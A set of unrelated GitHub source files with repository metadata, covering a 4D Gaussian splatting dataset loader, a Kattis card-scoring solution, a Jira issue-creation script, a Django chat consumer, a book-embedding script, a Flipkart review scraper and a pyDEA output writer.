def readdynerfInfo(datadir,use_bg_points,eval):
# loading all the data follow hexplane format
# ply_path = os.path.join(datadir, "points3D_dense.ply")
ply_path = os.path.join(datadir, "points3D_downsample2.ply")
from scene.neural_3D_dataset_NDC import Neural3D_NDC_Dataset
train_dataset = Neural3D_NDC_Dataset(
datadir,
"train",
1.0,
time_scale=1,
scene_bbox_min=[-2.5, -2.0, -1.0],
scene_bbox_max=[2.5, 2.0, 1.0],
eval_index=0,
)
test_dataset = Neural3D_NDC_Dataset(
datadir,
"test",
1.0,
time_scale=1,
scene_bbox_min=[-2.5, -2.0, -1.0],
scene_bbox_max=[2.5, 2.0, 1.0],
eval_index=0,
)
train_cam_infos = format_infos(train_dataset,"train")
val_cam_infos = format_render_poses(test_dataset.val_poses,test_dataset)
nerf_normalization = getNerfppNorm(train_cam_infos)
# xyz = np.load
pcd = fetchPly(ply_path)
print("origin points,",pcd.points.shape[0])
print("after points,",pcd.points.shape[0])
scene_info = SceneInfo(point_cloud=pcd,
train_cameras=train_dataset,
test_cameras=test_dataset,
video_cameras=val_cam_infos,
nerf_normalization=nerf_normalization,
ply_path=ply_path,
maxtime=300
)
return scene_info
def setup_camera(w, h, k, w2c, near=0.01, far=100):
from diff_gaussian_rasterization import GaussianRasterizationSettings as Camera
fx, fy, cx, cy = k[0][0], k[1][1], k[0][2], k[1][2]
w2c = torch.tensor(w2c).cuda().float()
cam_center = torch.inverse(w2c)[:3, 3]
w2c = w2c.unsqueeze(0).transpose(1, 2)
opengl_proj = torch.tensor([[2 * fx / w, 0.0, -(w - 2 * cx) / w, 0.0],
[0.0, 2 * fy / h, -(h - 2 * cy) / h, 0.0],
[0.0, 0.0, far / (far - near), -(far * near) / (far - near)],
[0.0, 0.0, 1.0, 0.0]]).cuda().float().unsqueeze(0).transpose(1, 2)
full_proj = w2c.bmm(opengl_proj)
cam = Camera(
image_height=h,
image_width=w,
tanfovx=w / (2 * fx),
tanfovy=h / (2 * fy),
bg=torch.tensor([0, 0, 0], dtype=torch.float32, device="cuda"),
scale_modifier=1.0,
viewmatrix=w2c,
projmatrix=full_proj,
sh_degree=0,
campos=cam_center,
prefiltered=False,
debug=True
)
return cam
def plot_camera_orientations(cam_list, xyz):
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# ax2 = fig.add_subplot(122, projection='3d')
# xyz = xyz[xyz[:,0]<1]
threshold=2
xyz = xyz[(xyz[:, 0] >= -threshold) & (xyz[:, 0] <= threshold) &
(xyz[:, 1] >= -threshold) & (xyz[:, 1] <= threshold) &
(xyz[:, 2] >= -threshold) & (xyz[:, 2] <= threshold)]
ax.scatter(xyz[:,0],xyz[:,1],xyz[:,2],c='r',s=0.1)
for cam in tqdm(cam_list):
# 提取 R 和 T
R = cam.R
T = cam.T
direction = R @ np.array([0, 0, 1])
ax.quiver(T[0], T[1], T[2], direction[0], direction[1], direction[2], length=1)
ax.set_xlabel('X Axis')
ax.set_ylabel('Y Axis')
ax.set_zlabel('Z Axis')
plt.savefig("output.png")
# breakpoint()
def readPanopticmeta(datadir, json_path):
with open(os.path.join(datadir,json_path)) as f:
test_meta = json.load(f)
w = test_meta['w']
h = test_meta['h']
max_time = len(test_meta['fn'])
cam_infos = []
for index in range(len(test_meta['fn'])):
focals = test_meta['k'][index]
w2cs = test_meta['w2c'][index]
fns = test_meta['fn'][index]
cam_ids = test_meta['cam_id'][index]
time = index / len(test_meta['fn'])
# breakpoint()
for focal, w2c, fn, cam in zip(focals, w2cs, fns, cam_ids):
image_path = os.path.join(datadir,"ims")
image_name=fn
# breakpoint()
image = Image.open(os.path.join(datadir,"ims",fn))
im_data = np.array(image.convert("RGBA"))
# breakpoint()
im_data = PILtoTorch(im_data,None)[:3,:,:]
# breakpoint()
# print(w2c,focal,image_name)
camera = setup_camera(w, h, focal, w2c)
cam_infos.append({
"camera":camera,
"time":time,
"image":im_data})
cam_centers = np.linalg.inv(test_meta['w2c'][0])[:, :3, 3] # Get scene radius
scene_radius = 1.1 * np.max(np.linalg.norm(cam_centers - np.mean(cam_centers, 0)[None], axis=-1))
# breakpoint()
return cam_infos, max_time, scene_radius
def readPanopticSportsinfos(datadir):
train_cam_infos, max_time, scene_radius = readPanopticmeta(datadir, "train_meta.json")
test_cam_infos,_, _ = readPanopticmeta(datadir, "test_meta.json")
nerf_normalization = {
"radius":scene_radius,
"translate":torch.tensor([0,0,0])
}
ply_path = os.path.join(datadir, "pointd3D.ply")
# Since this data set has no colmap data, we start with random points
plz_path = os.path.join(datadir, "init_pt_cld.npz")
data = np.load(plz_path)["data"]
xyz = data[:,:3]
rgb = data[:,3:6]
num_pts = xyz.shape[0]
pcd = BasicPointCloud(points=xyz, colors=rgb, normals=np.ones((num_pts, 3)))
storePly(ply_path, xyz, rgb)
# pcd = fetchPly(ply_path)
# breakpoint()
scene_info = SceneInfo(point_cloud=pcd,
train_cameras=train_cam_infos,
test_cameras=test_cam_infos,
video_cameras=test_cam_infos,
nerf_normalization=nerf_normalization,
ply_path=ply_path,
maxtime=max_time,
)
return scene_info
sceneLoadTypeCallbacks = {
"Colmap": readColmapSceneInfo,
"Blender" : readNerfSyntheticInfo,
"dynerf" : readdynerfInfo,
"nerfies": readHyperDataInfos, # NeRFies & HyperNeRF dataset proposed by [https://github.com/google/hypernerf/releases/tag/v0.1]
"PanopticSports" : readPanopticSportsinfos
}
| hustvl/4DGaussians | scene/dataset_readers.py | dataset_readers.py | py | 23,816 | python | en | code | 995 | github-code | 36 |
3131749916 | #https://open.kattis.com/problems/bela
def dom(x):
values = {"A":11, "K":4, "Q":3, "J":20, "T":10, "9":14}
return(values[x] if x in values else 0)
def rec(x):
values = {"A":11, "K":4, "Q":3, "J":2, "T":10}
return(values[x] if x in values else 0)
info = input().split(" ")
cards = []
score = 0
for i in range(4*int(info[0])):
cards += [input()]
for card in cards:
if card[1] == info[1]: #dom
score += dom(card[0])
else: #rec
score += rec(card[0])
print(score)
| MrLuigiBean/Some-Open-Kattis-Problems | Python3/Bela.py | Bela.py | py | 504 | python | en | code | 0 | github-code | 36 |
3540344939 | import requests
from requests.auth import HTTPBasicAuth
import json
from decouple import config
url = "https://climate.jira.com/rest/api/2/issue"
auth = HTTPBasicAuth(
"brandon.hoffman@climate.com",
f"{config('JIRA_API_KEY')}"
)
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
payload = json.dumps({
"fields": {
"project": {
"key": "HELIOS"
},
"summary": "Hackathon AI DevOps Test",
"description": "This is just a test ticket",
"issuetype": {
"name": "Bug"
}
}
})
response = requests.request(
"POST",
url,
data=payload,
headers=headers,
auth=auth,
verify=False
)
print(json.dumps(json.loads(response.text), sort_keys=True, indent=4, separators=(",", ": "))) | branhoff/jira-gpt-enhancer | backend/create_issue.py | create_issue.py | py | 811 | python | en | code | 0 | github-code | 36 |
22124651099 | import json
from channels.generic.websocket import AsyncWebsocketConsumer
from channels.db import database_sync_to_async
from .models import Message
from userauth.models import User
from .models import Conversation
class ChatConsumer(AsyncWebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.room_name = None
self.room_group_name = None
self.user = None
async def connect(self):
self.user = self.scope['user']
self.room_name = self.scope['url_route']['kwargs']['room_name']
self.room_group_name = 'chat_%s' % self.room_name
if self.user.is_authenticated:
await self.channel_layer.group_add(
self.room_group_name,
self.channel_name
)
await self.accept()
else:
await self.close()
async def disconnect(self, close_code):
room_name = self.scope['url_route']['kwargs']['room_name']
print(f"WebSocket disconnected from room '{room_name}'.")
await self.channel_layer.group_discard(
self.room_group_name,
self.channel_name
)
async def receive(self, text_data):
text_data_json = json.loads(text_data)
if 'message' in text_data_json:
# Message handling
message = text_data_json['message']
await self.save_message(message)
await self.channel_layer.group_send(
self.room_group_name,
{
'type': 'chat_message',
'message': message
}
)
elif 'shared_key' in text_data_json:
# Shared key handling
shared_key = text_data_json['shared_key']
await self.channel_layer.group_send(
self.room_group_name,
{
'type': 'send_shared_key',
'shared_key': shared_key
}
)
elif 'symmetric_key' in text_data_json:
symmetric_key = text_data_json['symmetric_key']
await self.channel_layer.group_send(
self.room_group_name,
{
'type': 'send_symmetric_key',
'symmetric_key': symmetric_key
}
)
async def chat_message(self, event):
message = event['message']
conversation = Conversation.objects.get(room=self.room_name)
await self.send(text_data=json.dumps({
'type': 'message',
'sender': conversation.sender.username,
'receiver': conversation.receiver.username,
'message': message
}))
async def send_shared_key(self, event):
shared_key = event['shared_key']
await self.send(text_data=json.dumps({
'type': 'shared_key',
'shared_key': shared_key
}))
async def send_symmetric_key(self, event):
symmetric_key = event['symmetric_key']
await self.send(text_data=json.dumps({
'type': 'symmetric_key',
'symmetric_key': symmetric_key
}))
@database_sync_to_async
def save_message(self, message):
room_name = self.scope['url_route']['kwargs']['room_name']
conversation = Conversation.objects.get(room=room_name)
new_message = Message.objects.create(
conversation=conversation,
message=message,
is_read=False
)
new_message.save()
| codynego/ChaCha | chat/consumers.py | consumers.py | py | 3,576 | python | en | code | 1 | github-code | 36 |
74352476903 | # -*- coding: utf-8 -*-
"""
-------------------------------------------------------------------------------
GUFY - Copyright (c) 2019, Fabian Balzer
Distributed under the terms of the GNU General Public License v3.0.
The full license is in the file LICENSE.txt, distributed with this software.
-------------------------------------------------------------------------------
@author: Fabian Balzer (fabian.balzer@studium.uni-hamburg.de)
Module containing all commands used for the creation of the CheckBoxes
"""
import PyQt5.QtGui as QG
import PyQt5.QtCore as QC
import PyQt5.QtWidgets as QW
class coolCheckBox(QW.QCheckBox):
"""Modified version of QCheckBoxes.
Creates a QCheckBox with a given text and tooltip.
params:
text: Text to be shown
tooltip: optionally create a tooltip for the edit
checked: Bool set to false by default.
"""
def __init__(self, text=None, tooltip=None, checked=False, width=150):
super().__init__()
self.setText(text)
self.setToolTip(tooltip)
self.setChecked(checked)
if width is not None:
self.setFixedWidth(width)
self.setStyleSheet("""QCheckBox {color: rgb(0, 0, 0); height: 18 px}
QCheckBox::indicator:unchecked {
image: url(simgui_registry/Icons/CheckBoxUncheckedBase.png); height: 17 px}
QCheckBox::indicator:unchecked:hover {
image: url(simgui_registry/Icons/CheckBoxUncheckedHover.png); height: 17 px;}
QCheckBox::indicator:unchecked:pressed {
image: url(simgui_registry/Icons/CheckBoxUncheckedPressed.png); height: 17 px;}
QCheckBox::indicator:unchecked:disabled {
image: url(simgui_registry/Icons/CheckBoxUncheckedDisabled.png); height: 17 px;}
QCheckBox::indicator:checked {
image: url(simgui_registry/Icons/CheckBoxCheckedBase.png); height: 17 px;}
QCheckBox::indicator:checked:hover {
image: url(simgui_registry/Icons/CheckBoxCheckedHover.png); height: 17 px}
QCheckBox::indicator:checked:pressed {
image: url(simgui_registry/Icons/CheckBoxCheckedPressed.png); height: 17 px}
QCheckBox::indicator:checked:disabled {
image: url(simgui_registry/Icons/CheckBoxCheckedDisabled.png); height: 17 px}""")
# %% Creation
def createAllCheckBoxes(Param_Dict, CheckBox_Dict):
"""Creates all necessary CheckBoxes and stores them in CheckBox_Dict
params:
Param_Dict: For storing output
CheckBox_Dict: Dict to contain all the checkBoxes
"""
hand = Param_Dict["SignalHandler"]
AnnotationBoxes = createAnnotationBoxes()
LogBoxes = createLogBoxes()
ProfileBoxes = createProfileBoxes()
Boxes = AnnotationBoxes + LogBoxes + ProfileBoxes # Merge the lists
keys = ["Timestamp", "Scale", "Grid", "VelVectors", "VelStreamlines",
"MagVectors", "MagStreamlines", "Contour", "ParticleAnno",
"LineAnno", "XLog",
"YLog", "ZLog", "AddProfile", "TimeSeriesProf"]
for i, key in enumerate(keys):
CheckBox_Dict[key] = Boxes[i]
CheckBox_Dict["DomainDiv"] = createDomainDivBox()
CheckBox_Dict["SetAspect"] = coolCheckBox("Ignore aspect ratio",
"If checked, the plot may not "
"have the default aspect.",
width=None)
CheckBox_Dict["CommentsForPlot"] = coolCheckBox("Enable script comments",
"If checked, the output sc"
"ript will have comments "
"with suggestions in it",
True, width=200)
CheckBox_Dict["ParticlePlot"] = createParticlePlotBox()
CheckBox_Dict["ParticlePlot"].toggled.connect(lambda: hand.getParticleInput())
CheckBox_Dict["Timestamp"].toggled.connect(lambda: hand.getAnnotationInput("Timestamp"))
CheckBox_Dict["Scale"].toggled.connect(lambda: hand.getAnnotationInput("Scale"))
CheckBox_Dict["Grid"].toggled.connect(lambda: hand.getAnnotationInput("Grid"))
CheckBox_Dict["VelVectors"].toggled.connect(lambda: hand.getAnnotationInput("VelVectors"))
CheckBox_Dict["VelStreamlines"].toggled.connect(lambda: hand.getAnnotationInput("VelStreamlines"))
CheckBox_Dict["MagVectors"].toggled.connect(lambda: hand.getAnnotationInput("MagVectors"))
CheckBox_Dict["MagStreamlines"].toggled.connect(lambda: hand.getAnnotationInput("MagStreamlines"))
CheckBox_Dict["Contour"].toggled.connect(lambda: hand.getAnnotationInput("Contour"))
CheckBox_Dict["ParticleAnno"].toggled.connect(lambda: hand.getAnnotationInput("ParticleAnno"))
CheckBox_Dict["LineAnno"].toggled.connect(lambda: hand.getAnnotationInput("LineAnno"))
CheckBox_Dict["XLog"].toggled.connect(lambda: hand.getAnnotationInput("XLog"))
CheckBox_Dict["YLog"].toggled.connect(lambda: hand.getAnnotationInput("YLog"))
CheckBox_Dict["ZLog"].toggled.connect(lambda: hand.getAnnotationInput("ZLog"))
CheckBox_Dict["AddProfile"].toggled.connect(lambda: hand.getAddProfileInput())
CheckBox_Dict["TimeSeriesProf"].toggled.connect(lambda: hand.getAnnotationInput("TimeSeriesProf"))
CheckBox_Dict["DomainDiv"].toggled.connect(lambda: hand.getDomainDivInput())
CheckBox_Dict["SetAspect"].toggled.connect(lambda: hand.getAnnotationInput("SetAspect"))
CheckBox_Dict["CommentsForPlot"].toggled.connect(lambda: hand.getAnnotationInput("CommentsForPlot"))
return
def createAnnotationBoxes(width=200, defaultString=" "):
"""Creates CheckBoxes where the user can toggle annotations for the plot.
returns:
boxList: List containing the checkboxes
"""
texts = ["Timestamp", "Scale", "Grid", "Velocity vectors",
"Velocity Streamlines",
"Magnetic field vectors", "Magnetic field Streamlines",
"Contour lines", "Particles", "Start and end point"]
tooltips = [f"Toggle {defaultString}{text.lower()} annotation" for text in texts]
boxList = []
for i, text in enumerate(texts):
CB = coolCheckBox(text, tooltips[i], width=width)
boxList.append(CB)
boxList[-1].setFixedWidth(100)
boxList[0].setChecked(True)
return boxList
def createLogBoxes():
"""Creates CheckBoxes where the user can select logarithmic scaling of an
axis.
returns:
boxList: List containing the checkboxes
"""
texts = ["Horizontal axis", "Vertical axis", "Color axis"]
tooltips = ["Set " + axis + " logarithmic" for axis in texts]
boxList = []
for text, tooltip in zip(texts, tooltips):
CB = coolCheckBox(text, tooltip)
boxList.append(CB)
boxList[1].setChecked(True)
boxList[2].setChecked(True)
return boxList
def createProfileBoxes():
"""Create two CheckBoxes that are used to make multiple plots for either
multiple fields or multiple times possible.
"""
texts = ["Add a second Profile", ""]
tooltips = ["If checked, the selected field will be added to the current "
"plot instead of overwriting it", "Plot the field for multiple"
" times"]
boxList = [] # "AddProfile", "TimeSeriesProf" are the names they are saved as
for text, tooltip in zip(texts, tooltips):
CB = coolCheckBox(text, tooltip)
boxList.append(CB)
boxList[1].setFixedWidth(20)
boxList[0].setDisabled(True) # This will only be enabled if the plotWindow aready has a profile plot
boxList[1].setHidden(True) # This will only be shown in time series mode
return boxList
def createDomainDivBox():
"""Creates a CheckBox that can be checked so during projection, the result
of projection is divided by the domain height"""
domainDivBox = coolCheckBox("Divide by height", "Divide the result of "
"projection by the domain height")
return domainDivBox
def createParticlePlotBox():
"""Creates a CheckBox that can be checked during phase or projection to
plot particle instead of gas fields."""
pbox = coolCheckBox("Particle plot", "Changes the fields to "
"the available particle fields of the dataset.",
width=None)
return pbox
| Fabian-Balzer/GUFY | GUFY/simgui_modules/checkBoxes.py | checkBoxes.py | py | 8,443 | python | en | code | 0 | github-code | 36 |
73563359464 | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '/fslhome/lc453/mlip-2/lib')))
from mpi4py import MPI
from ase.db import connect
from ase.optimize import BFGS
from ase.db import connect # api for connecting to the atoms database
import numpy as np
in_dir=".."
prefix=""
suffix="6"
cutoff=0.01
i=0
min_dists=[]
curr_min=10
while(os.path.exists(in_dir+"/it"+str(i+1)+"/"+prefix+"chull_dists"+suffix+".npy")):
data=np.load(in_dir+"/it"+str(i+1)+"/"+prefix+"chull_dists"+suffix+".npy")
print(min(data))
if min(data)<curr_min:
curr_min= min(data)
min_dists.append(curr_min)
i+=1
print(min_dists)
i=0
| msg-byu/HfNiTi-genetic | get_energy_data.py | get_energy_data.py | py | 678 | python | en | code | 0 | github-code | 36 |
13367936976 | from dotenv import load_dotenv
from os import getenv
from model import load_embeddings_model
from csv import DictReader
from ast import literal_eval
from langchain.schema.document import Document
from langchain.vectorstores import FAISS
def _load_books() -> list:
"""
Load the books from a csv file and organize each book.
Returns:
list: A list of each book.
"""
# Read books from file
books = []
with open('data\\books.csv', 'r', encoding='utf-8') as file:
reader = DictReader(file)
books = list(reader)
# Convert each book into a string
book_strings = []
for book in books:
author = None
if len(book['authors']) > 3 and len(literal_eval(book['authors'])) > 0:
author = literal_eval(book['authors'])[0]
subjects = None
if len(book['subjects']) > 3 and len(literal_eval(book['subjects'])) > 0:
subjects = ', '.join(literal_eval(book['subjects']))
synopsis = book['synopsis'] if len(book['synopsis']) > 0 else None
summary = book['title'] if 'title' in book else "No Title"
summary += f" by {author}\n" if author else "\n"
summary += f"Subjects: {subjects}\n" if subjects else ""
summary += f"Synopsis: {synopsis}" if synopsis else ""
book_strings.append(summary)
return [Document(page_content=book) for book in book_strings]
def embed_books():
"""
Embed the books into a FAISS index and save it locally.
"""
# Load environment variables
load_dotenv()
api_key = getenv('OPENAI_API_KEY')
# Load embeddings model
embeddings_model = load_embeddings_model("openai", api_key, max_retries=600)
# Retrieve the books
books = _load_books()
# Embed the books into a FAISS index
index = FAISS.from_documents(books, embeddings_model)
# Save the FAISS index locally
index.save_local("index")
def get_relevant_books(query: str, top_k: int) -> list:
"""
Search the embedded books for relevant books based on the provided query.
Args:
query (str): The search query.
top_k (int): The number of top relevant books to retrieve.
Returns:
list: A list of relevant books.
"""
# Load environment variables
load_dotenv()
api_key = getenv('OPENAI_API_KEY')
# Load embeddings model
embeddings_model = load_embeddings_model("openai", api_key)
# Load the FAISS index locally
index = FAISS.load_local("index", embeddings_model)
# Search the FAISS index for relevant books
docs = index.similarity_search(query, top_k)
return [doc.page_content for doc in docs] | AethersHaven/Bookie | embed.py | embed.py | py | 2,661 | python | en | code | 0 | github-code | 36 |
11543344946 | from flask import Flask, render_template, request,jsonify
from flask_cors import CORS,cross_origin
import requests
from bs4 import BeautifulSoup as bs
from urllib.request import urlopen
import logging
import pymongo
logging.basicConfig(filename="scrapper.log" , level=logging.INFO)
app = Flask(__name__)
@app.route("/", methods = ['GET'])
def homepage():
return render_template("index.html")
@app.route("/review" , methods = ['POST' , 'GET'])
def index():
if request.method == 'POST':
try:
searchString = request.form['content'].replace(" ","")
flip_url = "https://www.flipkart.com/search?q=" + searchString
url_opened = urlopen(flip_url).read()
code_beautify = bs(url_opened,'html.parser')
bigbox = code_beautify.find_all("div",{"class":"_13oc-S"})
filename = searchString + ".csv"
fw = open(filename, "w")
headers = "Product, Customer Name, Rating, Heading, Comment \n"
fw.write(headers)
allurl=[]
for i in bigbox:
a=("https://www.flipkart.com" + i.div.div.a["href"])
allurl.append(a)
rating = []
short_com = []
main_com = []
name = []
reviews=[]
for j in allurl:
opener = requests.get(j)
opener.encoding='utf-8'
product_link_code_bs = bs(opener.text,'html.parser')
rating1 = product_link_code_bs.find_all("div",{"class":["col _2wzgFH","t-ZTKy _1QgsS5"]})
shortlong_comm = product_link_code_bs.find_all("div",{"class":"_6K-7Co"})
short = product_link_code_bs.find_all("p",{"class":"_2-N8zT"})
comment = product_link_code_bs.find_all("div",{"class":"t-ZTKy"})
name_tag = product_link_code_bs.find_all("div",{"class":"row _3n8db9"})
try:
for i in rating1:
b = (i.div.div.text)
rating.append(b)
except:
b = "No rating"
logging.info("b")
try:
for s in name_tag:
u = (s.div.p.text)
name.append(u)
except:
u = "No Name"
logging.info("u")
try:
for y in short:
c = (y.text)
short_com.append(c)
if len(short_com) != len(rating):
for k in shortlong_comm:
c = (k.text)
short_com.append(c)
except:
c = "No Short Comment"
logging.info("c")
try:
for l in shortlong_comm:
d = (l.text)
main_com.append(d)
if len(main_com) != len(rating):
for l in comment:
d =(l.div.div.text)
main_com.append(d)
except:
d = "No Long Comment"
logging.info("d")
for i in range (len(rating)):
mydict = {"Search Term": searchString ,"Name" : name[i], "Rating": rating[i], "CommentHead": short_com[i],"Comment": main_com[i]}
reviews.append(mydict)
logging.info("log my final result {}".format(reviews))
client = pymongo.MongoClient("mongodb+srv://naman7374:naman7374@cluster0.ehmrlj9.mongodb.net/?retryWrites=true&w=majority")
db =client['scrapper_eng_pwskills']
coll_pw_eng = db['scraper_pwskills_eng']
coll_pw_eng.insert_many(reviews)
return render_template('result.html', reviews=reviews[0:(len(reviews)-1)])
except Exception as e:
logging.info("e")
return 'something is wrong 6'
else:
return render_template('index.html')
if __name__=="__main__":
app.run(host="0.0.0.0") | nnamanagarwal/data_science_project | new_pw_eng_scrap/app.py | app.py | py | 4,203 | python | en | code | 0 | github-code | 36 |
71186846185 | """
1. Ingresa a https://developer.twitter.com/
2. Accede con tu cuenta de Twitter ó crea una cuenta
3. Busca en la página la forma de solicitar una cuenta para desarrollador
4. Completa la información que se te solicita
5. Crea tu proyecto
6. Copia los tokens de tu proyecto
7. Pega las credenciales en este archivo de Python
Debes colocar tus credenciales de la API de Twitter
"""
API_KEY = ''
API_SECRET_KEY = ''
ACCESS_TOKEN = ''
ACCESS_TOKEN_SECRET = ''
| xtecuan/CursoCienciaDeDatos | CursoCienciaDeDatos_ejemplos/sesion4/credentials.py | credentials.py | py | 498 | python | es | code | 0 | github-code | 36 |
42578020211 | ''' This module contains functions and classes responsible for
writing solutions into different outputs (files, screen, GUI, etc).
Warning:
if new methods for writing output are added, they MUST
follow the rule: data must be added
sequentially, row after row, column after column.
'''
import pulp
from itertools import chain
from collections import defaultdict
from pyDEA.core.utils.dea_utils import ZERO_TOLERANCE
from pyDEA.core.data_processing.targets_and_slacks import calculate_target
from pyDEA.core.data_processing.targets_and_slacks import calculate_radial_reduction
from pyDEA.core.data_processing.targets_and_slacks import calculate_non_radial_reduction
from pyDEA.core.utils.progress_recorders import NullProgress
class SheetWithParameters(object):
''' Writes parameters to a given output.
Attributes:
params (Parameters): parameters.
run_date (datetime): date and time when the problem was solved.
total_seconds (float): time (in seconds) needed to solve
the problem.
Args:
params (Parameters): parameters.
run_date (datetime): date and time when the problem was solved.
total_seconds (float): time (in seconds) needed to solve
the problem.
'''
def __init__(self, params, run_date, total_seconds):
self.params = params
self.run_date = run_date
self.total_seconds = total_seconds
def create_sheet_parameters(self, work_sheet, solution, start_row_index,
params_str):
''' Writes parameters to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'Parameters'
work_sheet.write(start_row_index, 0, 'Run date and time:')
work_sheet.write(start_row_index, 1, self.run_date.strftime('%c'))
work_sheet.write(start_row_index + 1, 0, 'Calculation time:')
work_sheet.write(start_row_index + 1, 1, '{0} seconds'.format(
self.total_seconds))
work_sheet.write(start_row_index + 2, 0, 'Parameter name')
work_sheet.write(start_row_index + 2, 1, 'Value')
row_index = start_row_index + 3
for param_name, param_value in self.params.params.items():
work_sheet.write(row_index, 0, param_name)
work_sheet.write(row_index, 1, param_value)
row_index += 1
return row_index
class SheetOnionRank(object):
''' Writes information about peel the onion solution to a given output.
Attributes:
ranks (list of dict of str to double):
list that contains dictionaries that map DMU code
to peel the onion rank.
Args:
ranks (list of dict of str to double):
list that contains dictionaries that map DMU code
to peel the onion rank.
'''
def __init__(self, ranks):
self.ranks = ranks
self.count = 0
def create_sheet_onion_rank(self, work_sheet, solution, start_row_index,
params_str):
''' Writes information about peel the onion solution to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'OnionRank'
# in case of max_slacks and peel-the-onion we should not
# write ranks twice
if self.count < len(self.ranks):
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(
start_row_index + 1, 0,
'Tier / Rank is the run in which DMU became efficient')
work_sheet.write(start_row_index + 2, 0, 'DMU')
work_sheet.write(start_row_index + 2, 1, 'Efficiency')
work_sheet.write(start_row_index + 2, 2, 'Tier / Rank')
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
row_index = start_row_index + 3
for dmu_code in ordered_dmu_codes:
work_sheet.write(
row_index, 0,
solution._input_data.get_dmu_user_name(dmu_code))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
work_sheet.write(row_index, 1,
solution.get_efficiency_score(dmu_code))
work_sheet.write(row_index, 2,
self.ranks[self.count][dmu_code])
else:
work_sheet.write(
row_index, 1,
pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 1
self.count += 1
return row_index
return -1
class SheetWithCategoricalVar(object):
''' Writes various solution information to a given output, and
adds categorical information if necessary.
Attributes:
categorical (str): name of categorical category.
Args:
categorical (str): name of categorical category.
'''
def __init__(self, categorical=None):
self.categorical = categorical
def create_sheet_efficiency_scores(self, work_sheet, solution,
start_row_index, params_str):
''' Writes efficiency scores to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = 'EfficiencyScores'
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 1, 'Efficiency')
if self.categorical is not None:
work_sheet.write(start_row_index + 1, 2,
'Categorical: {0}'.format(self.categorical))
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
row_index = 0
for count, dmu_code in enumerate(ordered_dmu_codes):
row_index = start_row_index + count + 2
work_sheet.write(
row_index, 0, solution._input_data.get_dmu_user_name(dmu_code))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
work_sheet.write(
row_index, 1, solution.get_efficiency_score(dmu_code))
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
if self.categorical is not None:
work_sheet.write(
row_index, 2,
int(solution._input_data.coefficients[
dmu_code, self.categorical]))
return row_index
def create_sheet_input_output_data_base(self, work_sheet, solution,
get_multiplier,
sheet_name, start_row_index,
params_str):
''' Writes input and output weights or weighted data to a given output
depending on input parameters.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
get_multiplier (func): function that scales weights.
sheet_name (str): name that will be written into the name
attribute of work_sheet.
start_row_index (int): initial row index (usually used to append
data to existing output).
params_str (str): string that is usually written in the first
row.
Returns:
int: index of the last row where data were written plus 1.
'''
work_sheet.name = sheet_name
work_sheet.write(start_row_index, 0, params_str)
work_sheet.write(start_row_index + 1, 0, 'DMU')
work_sheet.write(start_row_index + 1, 1, 'Efficiency')
init_column_index = 2
if self.categorical is not None:
work_sheet.write(start_row_index + 1, 2,
'Categorical: {0}'.format(self.categorical))
init_column_index = 3
categories = []
categories.extend(solution._input_data.input_categories)
categories.extend(solution._input_data.output_categories)
column_index = init_column_index
for category in categories:
work_sheet.write(start_row_index + 1, column_index, category)
column_index += 1
try:
solution.vrs_duals
except AttributeError:
pass
else:
work_sheet.write(start_row_index + 1,
init_column_index + len(categories), 'VRS')
row_index = start_row_index + 2
ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
for dmu_code in ordered_dmu_codes:
dmu_name = solution._input_data.get_dmu_user_name(dmu_code)
work_sheet.write(row_index, 0, dmu_name)
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
work_sheet.write(
row_index, 1, solution.get_efficiency_score(dmu_code))
if self.categorical is not None:
work_sheet.write(
row_index, 2,
int(solution._input_data.coefficients[
dmu_code, self.categorical]))
if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
column_index = init_column_index
for input_category in solution._input_data.input_categories:
work_sheet.write(
row_index, column_index,
get_multiplier(solution, dmu_code, input_category) *
solution.get_input_dual(dmu_code, input_category))
column_index += 1
for output_category in solution._input_data.output_categories:
work_sheet.write(
row_index, column_index,
get_multiplier(solution, dmu_code, output_category) *
solution.get_output_dual(dmu_code, output_category))
column_index += 1
try:
vrs_dual = solution.get_VRS_dual(dmu_code)
work_sheet.write(row_index, column_index, vrs_dual)
except AttributeError:
pass
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 1
return row_index
@staticmethod
def _get_const_multiplier(solution, dmu_code, category):
''' Helper method that is used for writing input and output data
to a given output.
Args:
solution (Solution): solution.
dmu_code (str): DMU code.
category (str): category name.
Returns:
int: always returns 1 since we don't need to scale weights.
'''
return 1
def create_sheet_input_output_data(self, work_sheet, solution,
start_row_index, params_str):
''' Writes input and output weights to a given output.
Args:
work_sheet: object that has name attribute and implements
write method, it actually writes data to some output
(like file, screen, etc.).
solution (Solution): solution.
start_row_index (int): initial row index (usually used to append
data to existing output).
